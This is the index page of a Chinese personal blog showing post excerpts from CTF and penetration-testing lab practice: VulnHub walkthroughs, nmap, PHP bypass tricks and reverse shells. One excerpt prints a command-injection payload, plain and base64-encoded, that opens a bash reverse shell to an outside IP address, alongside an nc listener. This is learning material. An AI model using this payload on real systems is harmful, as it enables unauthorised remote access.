Suzen的博客
  • 首页
  • 归档
  • 分类
  • 友链

NewYear CTF 2025--Web-🐍年大吉

题目网址:https://ctf.xidian.edu.cn/training/16?challenge=704 给了题目附件 app.py源码如下 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566
2025-04-29
刷题练习
#文件上传 源码覆盖

nmap的使用

参考文章: https://blog.csdn.net/2302_82189125/article/details/135961736 nmap的主要功能kali自带nmap,可以直接使用 主机发现: Nmap 可以通过发送网络探测包(ping 扫描)来确定一个网络中活跃的主机。这有助于确定哪些 IP 地址上有活动的设备。 端口扫描: Nmap 可以扫描目标主机的开放端口,帮助确定哪些服务正
2025-04-26
渗透打靶小知识
#渗透打靶 小知识

VulnHub靶机Earth复现

借鉴文章: https://blog.csdn.net/Czheisenberg/article/details/122900121 https://www.cnblogs.com/sainet/p/15638010.html 安装靶机靶机网址:https://www.vulnhub.com/entry/the-planets-earth,755/ VirtualBox网址:https://w
2025-04-26
渗透打靶
#渗透 打靶 复现

VulnHub靶机MoneyBox复现

借鉴文章: https://blog.csdn.net/YueXuan_521/article/details/135324089 https://blog.csdn.net/Aluxian_/article/details/128672602 安装靶机靶机网址:https://www.vulnhub.com/entry/moneybox-1,653/ VirtualBox网址:https:/
2025-04-26
渗透打靶
#渗透 打靶 复现

符号链接突破目录限制

源码如下 1234567891011<?phphighlight_file(__FILE__);require_once 'starven_secret.php';if(isset($_GET['file'])) { if(preg_match('/starven_secret.php/i', $_GET['
2025-04-25
小知识
#小知识

sprintf漏洞

sprintf函数函数功能sprintf是 PHP 中一个格式化字符串的函数,功能是根据指定的格式化字符串,将一系列参数转换并格式化为一个新的字符串 函数语法1sprintf(format, arg1, arg2,...) format:是必需参数,规定字符串以及如何格式化其中的变量,如果 format 字符串中不包含任何占位符(如 %s、%d 等),那么可以不需要额外的 arg 参数 arg
2025-04-25
小知识
#小知识

提权

用VPS反弹shell攻击机监听端口 1nc -lvp 2333 目标机 123127.0.0.1 | echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjIuNzUuMTI2LzIzMzMgMD4mMQ== | base64 -d| /bin/bash127.0.0.1 | echo bash -i >& /dev/tcp/47.122.75.126/2
2025-04-25
小知识
#小知识

MD5绕过

123对于:(string)$_GET['md5_1'] !== (string)$_GET['md5_2'] && md5($_GET['md5_1']) === md5($_GET['md5_2'])● md5_1=%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6
2025-04-25
小知识
#小知识

符号

1234567891011121314151617& 用于在同一命令行中依次执行多个命令,不管前面的命令执行是否成功,后面的命令都会继续执行&& 同样用于依次执行多个命令,但只有当前面的命令成功执行(返回退出码为 0)时,后面的命令才会执行| 是管道符,将前一个命令的输出作为后一个命令的输入|| 用于依次执行多个命令,只有当前面的命令执行失败(返回退出码不为 0)时
2025-04-25
小知识
#小知识

反弹shell

什么是反弹shell反弹shell(Reverse Shell)是一种常见的攻击方式,通常用于远程控制目标系统。它与传统的“反向连接”(Reverse Connection)相似,通过允许目标系统主动连接回攻击者的机器,从而绕过防火墙或NAT(网络地址转换)等网络安全措施。 反弹 shell 是一种网络攻击技术,它允许攻击者在远程目标机器上执行一个命令,使得目标机器主动向攻击者的机器发起网络连接,
2025-04-25
小知识
#小知识
12345

搜索

正在载入天数... 载入时分秒...
Hexo Fluid
总访问量 次 总访客数 人